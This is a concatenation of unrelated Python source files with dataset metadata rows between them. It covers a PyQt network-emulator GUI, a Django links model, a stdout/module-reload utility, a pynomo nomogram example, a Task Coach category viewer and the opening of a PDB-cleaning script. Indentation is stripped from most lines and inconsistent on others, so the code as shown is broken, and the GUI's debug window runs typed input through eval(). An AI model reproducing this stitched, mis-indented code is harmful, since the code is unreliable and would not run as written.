self.quitAct.setStatusTip(self.tr("Quit the application"))
self.connect(self.quitAct, QtCore.SIGNAL("triggered()"), self.quit)
self.newProjectAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "new.png"), self.tr("&New"), self)
self.newProjectAct.setShortcut(self.tr("Ctrl+Shift+N"))
self.newProjectAct.setStatusTip(self.tr("Create a new project"))
self.connect(self.newProjectAct, QtCore.SIGNAL("triggered()"), self.newProject)
self.openProjectAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "open.png"), self.tr("&Open"), self)
self.openProjectAct.setShortcut(self.tr("Ctrl+Shift+O"))
self.openProjectAct.setStatusTip(self.tr("Open an existing project"))
self.connect(self.openProjectAct, QtCore.SIGNAL("triggered()"), self.openProject)
self.closeProjectAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "close.png"), self.tr("&Close"), self)
self.closeProjectAct.setShortcut(self.tr("Ctrl+Shift+W"))
self.closeProjectAct.setStatusTip(self.tr("Close the current project"))
self.connect(self.closeProjectAct, QtCore.SIGNAL("triggered()"), self.closeProject)
self.tutorialAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "tutorial.png"), self.tr("&Tutorial"), self)
self.connect(self.tutorialAct, QtCore.SIGNAL("triggered()"), self.startTutorial)
self.faqAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "help.png"), self.tr("&FAQ"), self)
self.connect(self.faqAct, QtCore.SIGNAL("triggered()"), self.faq)
self.aboutAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "giniLogo.png"), self.tr("&About"), self)
self.aboutAct.setStatusTip(self.tr("Show the application's About box"))
self.connect(self.aboutAct, QtCore.SIGNAL("triggered()"), self.about)
self.aboutQtAct = QtGui.QAction(QtGui.QIcon(environ["images"] + "Qt-logo.png"), self.tr("About &Qt"), self)
self.aboutQtAct.setStatusTip(self.tr("Show the Qt library's About box"))
self.connect(self.aboutQtAct, QtCore.SIGNAL("triggered()"),
QtGui.qApp, QtCore.SLOT("aboutQt()"))
def createMenus(self):
"""
Create the menus with actions.
"""
self.fileMenu = self.menuBar().addMenu(self.tr("&File"))
self.fileMenu.setPalette(defaultOptions["palette"])
self.fileMenu.addAction(self.newSceneAct)
self.fileMenu.addAction(self.loadAct)
self.fileMenu.addAction(self.saveAct)
self.fileMenu.addAction(self.saveAsAct)
self.fileMenu.addAction(self.sendFileAct)
self.fileMenu.addAction(self.exportAct)
self.fileMenu.addAction(self.closeAct)
self.fileMenu.addSeparator()
self.fileMenu.addAction(self.quitAct)
self.projectMenu = self.menuBar().addMenu(self.tr("&Project"))
self.projectMenu.setPalette(defaultOptions["palette"])
self.projectMenu.addAction(self.newProjectAct)
self.projectMenu.addAction(self.openProjectAct)
self.projectMenu.addAction(self.closeProjectAct)
self.editMenu = self.menuBar().addMenu(self.tr("&Edit"))
self.editMenu.setPalette(defaultOptions["palette"])
self.editMenu.addAction(self.copyAct)
self.editMenu.addAction(self.arrangeAct)
self.editMenu.addAction(self.resetLayoutAct)
self.editMenu.addAction(self.expandSceneAct)
self.runMenu = self.menuBar().addMenu(self.tr("&Run"))
self.runMenu.setPalette(defaultOptions["palette"])
self.runMenu.addAction(self.startWGINIClientAct)
self.runMenu.addAction(self.discoverAct)
self.runMenu.addAction(self.compileAct)
self.runMenu.addAction(self.runAct)
self.runMenu.addAction(self.stopAct)
self.runMenu.addAction(self.startServerAct)
self.runMenu.addAction(self.startwServerAct)
self.configMenu = self.menuBar().addMenu(self.tr("&Config"))
self.configMenu.setPalette(defaultOptions["palette"])
self.configMenu.addAction(self.optionsAct)
self.menuBar().addSeparator()
self.helpMenu = self.menuBar().addMenu(self.tr("&Help"))
self.helpMenu.setPalette(defaultOptions["palette"])
self.helpMenu.addAction(self.tutorialAct)
self.helpMenu.addAction(self.faqAct)
self.helpMenu.addAction(self.aboutAct)
self.helpMenu.addAction(self.aboutQtAct)
def createPopupMenu(self):
"""
Customize the popup menu so that it is visible.
"""
popupMenu = QtGui.QMainWindow.createPopupMenu(self)
popupMenu.setPalette(defaultOptions["palette"])
return popupMenu
def createToolBars(self):
"""
Create the toolbars with actions.
"""
self.fileToolBar = self.addToolBar(self.tr("File"))
self.fileToolBar.addAction(self.newSceneAct)
self.fileToolBar.addAction(self.loadAct)
self.fileToolBar.addAction(self.saveAct)
self.fileToolBar.addAction(self.sendFileAct)
self.fileToolBar.addAction(self.exportAct)
self.fileToolBar.addAction(self.closeAct)
self.editToolBar = self.addToolBar(self.tr("Edit"))
self.editToolBar.addAction(self.copyAct)
self.editToolBar.addAction(self.resetLayoutAct)
self.editToolBar.addAction(self.expandSceneAct)
self.runToolBar = self.addToolBar(self.tr("Run"))
self.runToolBar.addAction(self.startServerAct)
self.runToolBar.addAction(self.discoverAct)
self.runToolBar.addAction(self.compileAct)
self.runToolBar.addAction(self.runAct)
self.runToolBar.addAction(self.stopAct)
self.runToolBar.addAction(self.startWGINIClientAct)
self.runToolBar.addAction(self.startwServerAct)
def createStatusBar(self):
"""
Create the status bar.
"""
self.statusBar().showMessage(self.tr("Ready"))
def createProgressBar(self):
"""
Create the progress bar.
"""
self.progressBar = QtGui.QProgressBar()
self.progressBar.setRange(0, 10000)
self.progressBar.setValue(0)
self.statusBar().addPermanentWidget(self.progressBar)
self.progressBar.show()
def getDeviceCount(self, alive=False):
"""
Return the interfaceable device count, or the alive ones if alive=True.
"""
from Core.Interfaceable import Interfaceable
count = 0.0
for item in self.canvas.scene().items():
if isinstance(item, Interfaceable):
if item.device_type != "REALM":
if alive and item.status in ("", "dead"):
continue
count += 1.0
return count
def updateProgressBar(self):
"""
Update the progress bar.
"""
        maxVal = self.progressBar.maximum()
        total = self.getDeviceCount()
        if not total:
            # avoid a division by zero when no interfaceable devices exist
            self.progressBar.setValue(0)
            return True
        finalVal = (self.getDeviceCount(True) / total) * maxVal
        if finalVal < 0:
            finalVal = 0
        self.progressBar.setValue(int(finalVal))
if finalVal == 0:
return True
return False
def createConfigWindows(self):
"""
Create the options window.
"""
self.configWindow = ConfigDialog(self)
def createDockWindows(self):
"""
Create the dock windows: dropbar, log, properties, interfaces, routes.
"""
self.log = LogWindow(self.tr("Log"), self)
self.log.append("Welcome to %s %s!\n"
% (Core.globals.PROG_NAME, Core.globals.PROG_VERSION))
self.log.append("To open an existing topology, please click the 'Open' icon from the tray above canvas!")
self.log.setGeometry(QtCore.QRect(0, 0, 800, 114))
mainWidgets["log"] = self.log
self.dropbar = DropBar(self.tr("Components"), self)
self.dropbar.setGeometry(QtCore.QRect(0, 0, 129, 390))
mainWidgets["drop"] = self.dropbar
self.properties = PropertiesWindow(self)
self.properties.setWindowTitle("Properties")
mainWidgets["properties"] = self.properties
self.interfaces = InterfacesWindow(self)
self.interfaces.setWindowTitle("Interfaces")
mainWidgets["interfaces"] = self.interfaces
self.routes = RoutesWindow(self.interfaces, self)
self.routes.setWindowTitle("Routes")
mainWidgets["routes"] = self.routes
self.tm = TaskManagerWindow(self)
self.tm.setWindowTitle("Task Manager")
mainWidgets["tm"] = self.tm
self.debugWindow = QtGui.QDockWidget(self.tr("Debug Window"))
self.debugWindow.setWidget(DebugWindow(self))
self.docks = {"Components":self.dropbar, "Log":self.log, "Properties":self.properties, "Interfaces":self.interfaces, "Routes":self.routes, "Task Manager":self.tm}
self.addDockWidget(QtCore.Qt.LeftDockWidgetArea, self.dropbar)
self.addDockWidget(QtCore.Qt.BottomDockWidgetArea, self.log)
self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.properties)
self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.interfaces)
self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.routes)
self.addDockWidget(QtCore.Qt.RightDockWidgetArea, self.tm)
self.tm.setFloating(True)
self.routes.setFloating(True)
self.debugWindow.setFloating(True)
def createPopupWindows(self):
"""
Create the different popup windows.
"""
self.exportWindow = ExportWindow(self)
self.sendWindow = SendDirectoryWindow(self)
self.popup = QtGui.QMessageBox(self)
self.popup.setIcon(QtGui.QMessageBox.Warning)
self.popup.setWindowIcon(QtGui.QIcon(environ["images"]+"giniLogo.png"))
mainWidgets["popup"] = self.popup
# specific dialog for client IP and port input
self.inputDialog = QtGui.QInputDialog(self)
self.inputDialog.setWindowIcon(QtGui.QIcon(environ["images"]+"giniLogo.png"))
mainWidgets["dialog"] = self.inputDialog
def keyPressEvent(self, event):
"""
Handle specific shortcut keys.
"""
key = event.key()
scene = self.canvas.scene()
if key == QtCore.Qt.Key_Escape:
scene.clearSelection()
elif key == QtCore.Qt.Key_Delete:
for item in scene.selectedItems():
item.delete()
elif key == QtCore.Qt.Key_C:
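            # cycle the selection backwards through the scene's items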
items = scene.items()
if not items:
return
selected = scene.selectedItems()
scene.clearSelection()
if selected:
index = items.index(selected[0])
items[index - 1].setSelected(True)
else:
items[0].setSelected(True)
elif key == QtCore.Qt.Key_H:
for dock in self.docks.values():
dock.setFloating(not dock.isFloating())
elif key == QtCore.Qt.Key_F10:
self.debugWindow.show()
def cleanup(self):
if self.server != None:
self.server.kill()
class DebugWindow(QtGui.QWidget):
def __init__(self, parent):
QtGui.QWidget.__init__(self)
self.parent = parent
self.layout = QtGui.QVBoxLayout()
#self.list = QtGui.QListWidget()
self.button = QtGui.QPushButton("Execute")
self.lineedit = QtGui.QLineEdit()
#self.layout.addWidget(self.list)
self.layout.addWidget(self.lineedit)
self.layout.addWidget(self.button)
self.setLayout(self.layout)
self.windows = {}
for key, val in mainWidgets.iteritems():
if key != "app" and key != "client" and val != None:
self.windows[key] = val
self.connect(self.button, QtCore.SIGNAL("clicked()"), self.execute)
def fill(self):
scene = mainWidgets["canvas"].scene()
for i in range(125):
scene.addItem(UML())
def execute(self):
canvas = mainWidgets["canvas"]
scene = canvas.scene()
#self.list.clear()
#for item in scene.items():
# try:
# self.list.addItem(item.getName() + "(%d,%d)" % (item.pos().x(), item.pos().y()))
# except:
# pass
#for name, window in self.windows.iteritems():
# self.list.addItem(name + ":" + str(window.geometry()))
text = str(self.lineedit.text())
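        # evaluate each semicolon-separated expression from the line edit and
        # print its result (debug-only convenience; input is trusted)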
if text:
lines = text.split(";")
for line in lines:
print eval(line)
if isinstance(canvas, Tutorial):
canvas.next()
|
mit
| 2,184,146,233,005,499,600
| 36.032797
| 248
| 0.561083
| false
| 4.235854
| false
| false
| false
|
daonb/django-oklinks
|
oklinks/models.py
|
1
|
1797
|
import os
from django.db import models
from django.contrib.contenttypes import generic
from django.contrib.contenttypes.models import ContentType
from django.utils.translation import ugettext_lazy as _
from django.core.files.storage import FileSystemStorage
from django.conf import settings
from managers import LinksManager, LinkTypeManager
class LinkType(models.Model):
title = models.CharField(max_length=200, verbose_name=_('title'))
image = models.ImageField(upload_to='icons')
objects = LinkTypeManager()
class Meta:
verbose_name = _('link type')
verbose_name_plural = _('link types')
def __unicode__(self):
return self.title
class Link(models.Model):
url = models.URLField(verbose_name='URL', max_length=1000,
verify_exists=False)
title = models.CharField(max_length=200, verbose_name=_('title'))
content_type = models.ForeignKey(ContentType,
verbose_name=_('content type'),
related_name="content_type_set_for_%(class)s")
object_pk = models.TextField(_('object ID'))
content_object = generic.GenericForeignKey(ct_field="content_type", fk_field="object_pk")
link_type = models.ForeignKey(LinkType, default=LinkTypeManager.default)
active = models.BooleanField(default=True)
objects = LinksManager()
class Meta:
verbose_name = _('link')
verbose_name_plural = _('links')
def __unicode__(self):
return "%s: %s" % (self.title, self.url)
class LinkedFile(models.Model):
link = models.ForeignKey(Link, null=True, blank=True, default=None)
sha1 = models.CharField(max_length=1000, null=True)
last_updated = models.DateTimeField(auto_now=True, null=True)
link_file = models.FileField(upload_to='link_files')
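# Illustrative usage (not part of the original module; assumes a saved model
# instance ``obj`` already exists in the project): the generic foreign key
# lets a Link attach to any object, e.g.
#   Link.objects.create(url='http://example.com/', title='Example',
#                       content_object=obj)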
|
bsd-3-clause
| 1,131,894,914,825,749,500
| 35.673469
| 93
| 0.687257
| false
| 3.898048
| false
| false
| false
|
mavroskardia/ilovemymudder
|
mudder/src/common/utils.py
|
1
|
2484
|
import sys
import os
import shutil
import io
import datetime
import time
import importlib
import threading
class HijackedStdOut(io.TextIOWrapper):
def write(self, s):
if s == '\n':
super().write(s)
return
s = '{:%Y.%m.%d %H:%M:%S} => {}'.format(datetime.datetime.now(), s)
super().write(s)
self.flush()
class HijackedStdIn(io.TextIOWrapper):
pass
class HijackedStdInBuffer(io.BufferedRandom):
pass
def hijack_stdout():
sys.stdout = HijackedStdOut(buffer=sys.stdout.buffer)
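# Illustrative: once hijack_stdout() has run, every print is prefixed with a
# timestamp, e.g. print('server up') emits "2024.01.01 12:00:00 => server up".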
def hijack_stdin():
sys.stdin = HijackedStdIn(buffer=HijackedStdInBuffer())
return sys.stdin
def clean():
dirs_to_remove = []
for path, dirs, files in os.walk(os.curdir):
if path.endswith('__pycache__'):
dirs_to_remove.append(path)
for d in dirs_to_remove:
print('cleaning', d)
shutil.rmtree(d)
class ModuleWatcher(object):
watched_files = []
def __init__(self, module, interval=2):
self.module = module
self.interval = interval
self.thread = threading.Thread(target=self.loop)
self.done = False
if module.__file__ in ModuleWatcher.watched_files:
raise Exception('This file is already being watched')
ModuleWatcher.watched_files.append(module.__file__)
def watch(self, action=None):
self.action = action
self.filename = self.module.__file__
self.t0 = os.stat(self.filename).st_mtime
self.thread.start()
def loop(self):
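        # poll the watched file's mtime; on a change, reload the module and
        # fire the optional callback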
while not self.done:
dt = os.stat(self.filename).st_mtime
if dt != self.t0:
print('{} was modified, reloading...'.format(self.module))
importlib.reload(self.module)
self.t0 = dt
if self.action: self.action()
time.sleep(self.interval)
def stop(self):
self.done = True
self.thread.join()
def watch_and_reload(module):
print('watching module {} for changes'.format(module))
mw = ModuleWatcher(module)
mw.watch()
return mw
if __name__ == '__main__':
if sys.argv[1] == 'clean':
clean()
elif sys.argv[1] == 'watch':
mod = importlib.import_module('.test', package='src.common')
watch = watch_and_reload(mod)
while True:
try:
time.sleep(1)
except KeyboardInterrupt:
watch.stop()
break
|
mit
| 892,111,590,700,638,300
| 23.84
| 75
| 0.579308
| false
| 3.690936
| false
| false
| false
|
lefakkomies/pynomo
|
examples/ex_type1_nomo_1.py
|
1
|
1854
|
"""
ex_type1_nomo_1.py
Simple nomogram of type 1: F1 + F2 + F3 = 0
Copyright (C) 2007-2009 Leif Roschier
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import sys
sys.path.insert(0, "..")
# sys.path[:0] = [".."]
from pynomo.nomographer import Nomographer
N_params_1 = {
'u_min': 0.0,
'u_max': 10.0,
'function': lambda u: u,
'title': r'$u_1$',
'tick_levels': 2,
'tick_text_levels': 1,
}
N_params_2 = {
'u_min': 0.0,
'u_max': 10.0,
'function': lambda u: u,
'title': r'$u_2$',
'tick_levels': 2,
'tick_text_levels': 1,
}
N_params_3 = {
'u_min': 0.0,
'u_max': -10.0,
'function': lambda u: u,
'title': r'$u_3$',
'tick_levels': 2,
'tick_text_levels': 1,
}
block_1_params = {
'block_type': 'type_1',
'width': 10.0,
'height': 10.0,
'f1_params': N_params_1,
'f2_params': N_params_2,
'f3_params': N_params_3,
'isopleth_values': [[6, 2, 'x']],
}
main_params = {
'filename': 'ex_type1_nomo_1.pdf',
'paper_height': 10.0,
'paper_width': 10.0,
'block_params': [block_1_params],
'transformations': [('rotate', 0.01), ('scale paper',)],
'title_str': r'$u_1+u_2+u_3=0$',
'debug': False,
}
Nomographer(main_params)
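# Reading the isopleth above: with u1 = 6 and u2 = 2 given, the nomogram
# solves u1 + u2 + u3 = 0 for the value marked 'x', i.e. u3 = -(6 + 2) = -8.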
|
gpl-3.0
| 1,613,223,115,143,167,700
| 24.39726
| 73
| 0.599784
| false
| 2.883359
| false
| false
| false
|
wdmchaft/taskcoach
|
taskcoachlib/gui/viewer/category.py
|
1
|
10590
|
# -*- coding: utf-8 -*-
'''
Task Coach - Your friendly task manager
Copyright (C) 2004-2010 Task Coach developers <developers@taskcoach.org>
Copyright (C) 2008 Rob McMullen <rob.mcmullen@gmail.com>
Copyright (C) 2008 Thomas Sonne Olesen <tpo@sonnet.dk>
Task Coach is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Task Coach is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import wx
from taskcoachlib import patterns, command, widgets
from taskcoachlib.domain import category
from taskcoachlib.i18n import _
from taskcoachlib.gui import uicommand, menu, dialog, render
import base, mixin
class BaseCategoryViewer(mixin.AttachmentDropTargetMixin,
mixin.SortableViewerForCategoriesMixin,
mixin.SearchableViewerMixin,
mixin.NoteColumnMixin, mixin.AttachmentColumnMixin,
base.SortableViewerWithColumns, base.TreeViewer):
SorterClass = category.CategorySorter
defaultTitle = _('Categories')
defaultBitmap = 'folder_blue_arrow_icon'
def __init__(self, *args, **kwargs):
kwargs.setdefault('settingsSection', 'categoryviewer')
super(BaseCategoryViewer, self).__init__(*args, **kwargs)
for eventType in (category.Category.subjectChangedEventType(),
category.Category.filterChangedEventType(),
category.Category.foregroundColorChangedEventType(),
category.Category.backgroundColorChangedEventType(),
category.Category.fontChangedEventType(),
category.Category.iconChangedEventType(),
category.Category.selectedIconChangedEventType(),
category.Category.exclusiveSubcategoriesChangedEventType()):
patterns.Publisher().registerObserver(self.onAttributeChanged,
eventType)
def onEveryMinute(self, event):
pass
def domainObjectsToView(self):
return self.taskFile.categories()
def curselectionIsInstanceOf(self, class_):
return class_ == category.Category
def createWidget(self):
imageList = self.createImageList() # Has side-effects
self._columns = self._createColumns()
itemPopupMenu = self.createCategoryPopupMenu()
columnPopupMenu = menu.ColumnPopupMenu(self)
self._popupMenus.extend([itemPopupMenu, columnPopupMenu])
widget = widgets.CheckTreeCtrl(self, self._columns,
self.onSelect, self.onCheck,
uicommand.CategoryEdit(viewer=self, categories=self.presentation()),
uicommand.CategoryDragAndDrop(viewer=self, categories=self.presentation()),
uicommand.EditSubject(viewer=self),
itemPopupMenu, columnPopupMenu,
**self.widgetCreationKeywordArguments())
widget.AssignImageList(imageList) # pylint: disable-msg=E1101
return widget
def createCategoryPopupMenu(self, localOnly=False):
return menu.CategoryPopupMenu(self.parent, self.settings, self.taskFile,
self, localOnly)
def _createColumns(self):
# pylint: disable-msg=W0142
kwargs = dict(renderDescriptionCallback=lambda category: category.description(),
resizeCallback=self.onResizeColumn)
columns = [widgets.Column('subject', _('Subject'),
category.Category.subjectChangedEventType(),
sortCallback=uicommand.ViewerSortByCommand(viewer=self,
value='subject'),
imageIndexCallback=self.subjectImageIndex,
width=self.getColumnWidth('subject'),
**kwargs),
widgets.Column('description', _('Description'),
category.Category.descriptionChangedEventType(),
sortCallback=uicommand.ViewerSortByCommand(viewer=self,
value='description'),
renderCallback=lambda category: category.description(),
width=self.getColumnWidth('description'),
**kwargs),
widgets.Column('attachments', '',
category.Category.attachmentsChangedEventType(), # pylint: disable-msg=E1101
width=self.getColumnWidth('attachments'),
alignment=wx.LIST_FORMAT_LEFT,
imageIndexCallback=self.attachmentImageIndex,
headerImageIndex=self.imageIndex['paperclip_icon'],
renderCallback=lambda category: '', **kwargs)]
if self.settings.getboolean('feature', 'notes'):
columns.append(widgets.Column('notes', '',
category.Category.notesChangedEventType(), # pylint: disable-msg=E1101
width=self.getColumnWidth('notes'),
alignment=wx.LIST_FORMAT_LEFT,
imageIndexCallback=self.noteImageIndex,
headerImageIndex=self.imageIndex['note_icon'],
renderCallback=lambda category: '', **kwargs))
return columns
def getImageIndices(self, category):
        bitmap = category.icon(recursive=True)
        bitmap_selected = category.selectedIcon(recursive=True) or bitmap
        normalIndex = self.imageIndex[bitmap] if bitmap else -1
        selectedIndex = self.imageIndex[bitmap_selected] if bitmap_selected else -1
        return normalIndex, selectedIndex
def subjectImageIndex(self, category, which):
normalImageIndex, expandedImageIndex = self.getImageIndices(category)
expanded = which in [wx.TreeItemIcon_Expanded,
wx.TreeItemIcon_SelectedExpanded]
return expandedImageIndex if expanded else normalImageIndex
def createToolBarUICommands(self):
commands = super(BaseCategoryViewer, self).createToolBarUICommands()
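        # list slice assignment splices the category commands in just before
        # the last two toolbar entries without overwriting anything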
commands[-2:-2] = [None,
uicommand.CategoryNew(categories=self.presentation(),
settings=self.settings),
uicommand.CategoryNewSubCategory(categories=self.presentation(),
viewer=self),
uicommand.CategoryEdit(categories=self.presentation(),
viewer=self),
uicommand.CategoryDelete(categories=self.presentation(),
viewer=self)]
return commands
def createColumnUICommands(self):
commands = [\
uicommand.ToggleAutoColumnResizing(viewer=self,
settings=self.settings),
None,
uicommand.ViewColumn(menuText=_('&Description'),
helpText=_('Show/hide description column'),
setting='description', viewer=self),
uicommand.ViewColumn(menuText=_('&Attachments'),
helpText=_('Show/hide attachments column'),
setting='attachments', viewer=self)]
if self.settings.getboolean('feature', 'notes'):
commands.append(uicommand.ViewColumn(menuText=_('&Notes'),
helpText=_('Show/hide notes column'),
setting='notes', viewer=self))
return commands
def onAttributeChanged(self, event):
if category.Category.exclusiveSubcategoriesChangedEventType() in event.types():
# We need to refresh the children of the changed item as well
# because they have to use radio buttons instead of checkboxes, or
# vice versa:
items = event.sources()
for item in items.copy():
items |= set(item.children())
self.widget.RefreshItems(*items)
else:
super(BaseCategoryViewer, self).onAttributeChanged(event)
def onCheck(self, event):
categoryToFilter = self.widget.GetItemPyData(event.GetItem())
categoryToFilter.setFiltered(event.GetItem().IsChecked())
self.onSelect(event) # Notify status bar
def getIsItemChecked(self, item):
if isinstance(item, category.Category):
return item.isFiltered()
return False
def getItemParentHasExclusiveChildren(self, item):
parent = item.parent()
return parent and parent.hasExclusiveSubcategories()
def isShowingCategories(self):
return True
def statusMessages(self):
status1 = _('Categories: %d selected, %d total')%\
(len(self.curselection()), len(self.presentation()))
filteredCategories = self.presentation().filteredCategories()
status2 = _('Status: %d filtered')%len(filteredCategories)
return status1, status2
def itemEditorClass(self):
return dialog.editor.CategoryEditor
def newItemCommandClass(self):
return command.NewCategoryCommand
def editItemCommandClass(self):
return command.EditCategoryCommand
def newSubItemCommandClass(self):
return command.NewSubCategoryCommand
def deleteItemCommandClass(self):
return command.DeleteCategoryCommand
class CategoryViewer(BaseCategoryViewer):
def __init__(self, *args, **kwargs):
super(CategoryViewer, self).__init__(*args, **kwargs)
self.filterUICommand.setChoice(self.settings.getboolean('view',
'categoryfiltermatchall'))
def getToolBarUICommands(self):
''' UI commands to put on the toolbar of this viewer. '''
toolBarUICommands = super(CategoryViewer, self).getToolBarUICommands()
toolBarUICommands.insert(-2, None) # Separator
# pylint: disable-msg=W0201
self.filterUICommand = \
uicommand.CategoryViewerFilterChoice(settings=self.settings)
toolBarUICommands.insert(-2, self.filterUICommand)
return toolBarUICommands
|
gpl-3.0
| 5,805,815,929,631,619,000
| 46.066667
| 117
| 0.622285
| false
| 4.833409
| false
| false
| false
|
singingwolfboy/flask-dance
|
flask_dance/consumer/storage/__init__.py
|
1
|
1267
|
from abc import ABCMeta, abstractmethod
class BaseStorage(metaclass=ABCMeta):
@abstractmethod
def get(self, blueprint):
return None
@abstractmethod
def set(self, blueprint, token):
return None
@abstractmethod
def delete(self, blueprint):
return None
class NullStorage(BaseStorage):
"""
This mock storage will never store OAuth tokens.
If you try to retrieve a token from this storage, you will always
get ``None``.
"""
def get(self, blueprint):
return None
def set(self, blueprint, token):
return None
def delete(self, blueprint):
return None
class MemoryStorage(BaseStorage):
"""
This mock storage stores an OAuth token in memory and so that it can
be retrieved later. Since the token is not persisted in any way,
this is mostly useful for writing automated tests.
The initializer accepts a ``token`` argument, for setting the
initial value of the token.
"""
def __init__(self, token=None, *args, **kwargs):
self.token = token
def get(self, blueprint):
return self.token
def set(self, blueprint, token):
self.token = token
def delete(self, blueprint):
self.token = None
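# A minimal illustration (not part of the original module): MemoryStorage can
# seed a token for automated tests without touching any real backend.
if __name__ == "__main__":
    storage = MemoryStorage(token={"access_token": "fake-token"})
    assert storage.get(blueprint=None) == {"access_token": "fake-token"}
    storage.delete(blueprint=None)
    assert storage.get(blueprint=None) is None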
|
mit
| 1,565,694,463,115,637,000
| 22.036364
| 72
| 0.648777
| false
| 4.508897
| false
| false
| false
|
schenc3/InteractiveROSETTA
|
InteractiveROSETTA/scripts/io_tools/process_pdb.py
|
1
|
117335
|
#!/usr/bin/env python
# :noTabs=true:
"""
create a directory of the contents in a PDB
splits into chains, grouped chains (pairings parsed from the header),
individual HETATM PDB lines, sequence files (FASTA), etc.
verbosely:
This method behaves slightly differently for PDB files with multiple models,
nucleic acids, duplicate complexes, etc.
so if you are interested in the specifics, please read the source code
In short, it tries to write:
header.txt a text file of the header lines
numbering_map.txt a text file showing 1-indexed PDB numbering
clean.pdb only ATOM lines
hetatm.pdb only HETATM lines, may be split by resName
.fa sequences of all peptides and nucleic acids
subdirectories for each protein model/subunit (similar info)
does not write a text file for the "trailer" (lines after the coordinates)
converts lines (ATOM or HETATM) that can be converted based on <conversion>
(generally) and <na_conversion> (specific for nucleic acids, relevant
because RNA and DNA may require different treatment...)
!!!WARNING!!! defaults:
CSE CYS converts SelenoCysteinE to Cysteine
HYP PRO converts HYdroxylProline to Proline
CYD CYS does NOT convert "CYsteine Disulfides to Cysteine"
HIP HIS converts "HIP" to Histidine (~double protonation)
HID HIS converts "HID" to Histidine (~single delta N proton)
HIE HIS converts "HIE" to Histidine (~single epsilon N proton)
todo:
ensure hetatm conversions step, illegal atoms!!!!
alternate conformations (mostly supported now)
convert DNA to Rosetta DNA
convert ligands to params
convert water to TP3 (or TP5)
Methods for cleaning and parsing PDB files
Most importantly, the process_pdb method does a lot to clean PDB files
from RCSB
Requires:
Biopython
Author: Evan H. Baugh
"""
################################################################################
# IMPORT
# common modules
import optparse # for commandline
import os
import shutil
# bigger modules
from Bio.Alphabet import IUPAC
from Bio import SeqIO
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from Bio.PDB import PDBIO
from Bio.PDB import PDBParser
from Bio.PDB import PPBuilder # no longer used, much faster way to do this
#from Bio.PDB import Select # no longer used...kinda hard to use
from Bio.PDB.Structure import Structure
from Bio.PDB.Model import Model
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
# custom modules
#from helper import get_root_filename , create_directory , copy_file
#from settings import SEQFORMAT , SEQFORMAT_EXTENSION_MAP , NUCLEIC_SEQUENCE_LETTERS_MAP , NA_CODES , three2one , WATER_CONVERSION , one2three , three2three , NA_CONVERSIONS_ROSETTA
#from biopython_settings import DNAAlphabet , ProteinAlphabet
#from seq_basics import write_sequence , get_sequence
################################################################################
# SETTINGS
# unholy settings...too many...
SEQFORMAT = 'fasta'
SEQFORMAT_EXTENSION_MAP = {
'fasta' : 'fa' ,
'genbank' : 'gb' ,
'clustal' : 'aln' ,
'stockholm' : 'ann'
}
# mapping for sequence file extensions
# update when you start using something new
SEQFORMAT_MAP = {
'fa' : 'fasta' ,
'fas' : 'fasta' ,
'fasta' : 'fasta' ,
'gbk' : 'genbank' ,
'gb' : 'genbank' ,
'aln' : 'clustal' ,
'ann' : 'stockholm' , # Pfam uses these
'pir' : 'pir' , # used by Modeller...
'sp' : 'swiss' # uniprot/swissprot
}
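# e.g. SEQFORMAT_EXTENSION_MAP['fasta'] yields 'fa' when naming output files,
# while SEQFORMAT_MAP['fa'] recovers 'fasta' from a file extension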
# Biopython Alphabets
DNAAlphabet = IUPAC.unambiguous_dna # requires Biopython
ProteinAlphabet = IUPAC.protein # requires Biopython
# simple amino acid mapping
one2three = {
'A':'ALA',
'C':'CYS',
'D':'ASP',
'E':'GLU',
'F':'PHE',
'G':'GLY',
'H':'HIS',
'I':'ILE',
'K':'LYS',
'L':'LEU',
'M':'MET',
'N':'ASN',
'P':'PRO',
'Q':'GLN',
'R':'ARG',
'S':'SER',
'T':'THR',
'V':'VAL',
'W':'TRP',
'Y':'TYR',
}
# the revers of above...maybe more?
three2one = {
'ALA':'A',
'CYS':'C',
'ASP':'D',
'GLU':'E',
'PHE':'F',
'GLY':'G',
'HIS':'H',
'ILE':'I',
'LYS':'K',
'LEU':'L',
'MET':'M',
'ASN':'N',
'PRO':'P',
'GLN':'Q',
'ARG':'R',
'SER':'S',
'THR':'T',
'VAL':'V',
'TRP':'W',
'TYR':'Y',
# pseudo-standard 3 letter codes for the standard aa
'CYD' : 'C' ,
'CYZ' : 'C' ,
'HID' : 'H' ,
'HIE' : 'H' ,
'HIP' : 'H' ,
# just to be sure...
'ala':'A',
'cys':'C',
'asp':'D',
'glu':'E',
'phe':'F',
'gly':'G',
'his':'H',
'ile':'I',
'lys':'K',
'leu':'L',
'met':'M',
'asn':'N',
'pro':'P',
'gln':'Q',
'arg':'R',
'ser':'S',
'thr':'T',
'val':'V',
'trp':'W',
'tyr':'Y',
'Ala':'A',
'Cys':'C',
'Asp':'D',
'Glu':'E',
'Phe':'F',
'Gly':'G',
'His':'H',
'Ile':'I',
'Lys':'K',
'Leu':'L',
'Met':'M',
'Asn':'N',
'Pro':'P',
'Gln':'Q',
'Arg':'R',
'Ser':'S',
'Thr':'T',
'Val':'V',
'Trp':'W',
'Tyr':'Y',
}
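# quick sanity check of the mappings above (illustrative only):
#   one2three['A']   -> 'ALA'
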